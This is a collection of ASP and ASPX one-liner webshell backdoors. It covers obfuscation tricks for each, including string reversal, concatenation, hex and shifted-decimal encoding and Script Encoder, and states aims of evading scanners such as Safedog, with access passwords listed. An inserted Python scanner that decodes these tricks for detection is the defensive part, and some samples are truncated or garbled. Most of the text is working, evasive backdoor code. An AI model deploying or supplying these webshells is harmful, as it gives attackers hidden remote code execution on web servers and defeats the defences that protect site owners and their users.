Collection of ASP one-liner webshells:
""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
"" then ExecuteGlobal request("c") end if %>
< %'
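UTF-7 encoding obfuscation:
Script Encoder encoding // password: c
This code reverses "eval request(/*/z/*/)" into ")/*/z/*/(tseuqer lave" to evade signature-based detection. When the script is accessed, its code is dynamically decoded and restored to the original one-liner backdoor. Currently more than 90% of unknown backdoors and variant backdoors use this kind of dynamic decoding technique.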
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
Password: z
One-liner webshell that can evade 雷客图:
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
password=Request("class")
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>
password=Request("class")
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>
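Seen from the detection side, the hiding tricks in the samples above (StrReverse, literal concatenation, hex pairs, shifted %NNN decimals) can be undone statically before keyword matching. The following is an added example, not code from the original page; the names scan, decodings and SAMPLES are assumptions, and it generalizes the page's fixed shift of 18 to a brute-forced shift.

```python
import re

# Dynamic-execution keywords the samples on this page try to hide from scanners.
SINK = re.compile(r"\b(?:executeglobal|execute|eval)\b", re.I)
CONCAT = re.compile(r'"\s*[&+]\s*"')            # "ex"&"e"&"cute" -> "execute"
LITERAL = re.compile(r'"([^"\r\n]*)"')
HEX = re.compile(r"(?:[0-9A-Fa-f]{2}){4,}")     # hex pairs, as fed to AACode
SHIFTED = re.compile(r"(?:%\d{1,3}){4,}")       # %NNN decimals, as fed to DeAsc


def decodings(lit):
    """Yield (method, text) for each transform demonstrated on this page."""
    yield "plain", lit
    yield "reversed", lit[::-1]                  # undo StrReverse
    if HEX.fullmatch(lit):
        yield "hex", bytes.fromhex(lit).decode("latin-1")
    if SHIFTED.fullmatch(lit):
        nums = [int(n) for n in lit.split("%")[1:]]
        for shift in range(1, 64):               # page uses 18; try each shift
            if all(32 <= n - shift < 127 for n in nums):
                yield f"shift-{shift}", "".join(chr(n - shift) for n in nums)


def scan(source):
    """Return sorted (method, decoded) pairs for string literals hiding a sink."""
    folded = CONCAT.sub("", source)              # join adjacent literal pieces
    hits = set()
    for lit in LITERAL.findall(folded):
        for method, text in decodings(lit):
            if SINK.search(text):
                if method == "plain" and lit not in source:
                    method = "concat"            # only visible after folding
                hits.add((method, text))
    return sorted(hits)


# Constructed test lines; the encoded literals are the ones quoted on this page.
SAMPLES = {
    "reverse": 'Execute MorfiCoder(")/*/z/*/(tseuqer lave")',
    "concat": 'ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")',
    "hex": 'Execute(AACode("457865637574652870617373776F726429"))',
    "shift": 'Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59"))',
    "benign": 'Response.Write("Hello, " & userName)',
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(name, scan(line))
```

Hits labelled plain are noisy on ordinary text; the reversed, concat, hex and shift hits are the higher-confidence ones, since legitimate pages rarely store an execution keyword in encoded form.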
Simple ASPX antivirus evasion
var a = Request.Item["M"];var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";// This is the main part; the other parts do not seem to get checked
eval(a,b);
Response.Write("Test");%>
One-liner that bypasses Safedog:
'
''''''''''''''''''
'''''''''play = request("#")%>Error
References:
Signatures of some common webshell backdoors https://zhuanlan.zhihu.com/p/22149072
A collection and summary of one-liner backdoors http://book.51cto.com/art/201204/328741.htm
Example of running cmd from ASP http://m.blog.csdn.net/woswod/article/details/63253494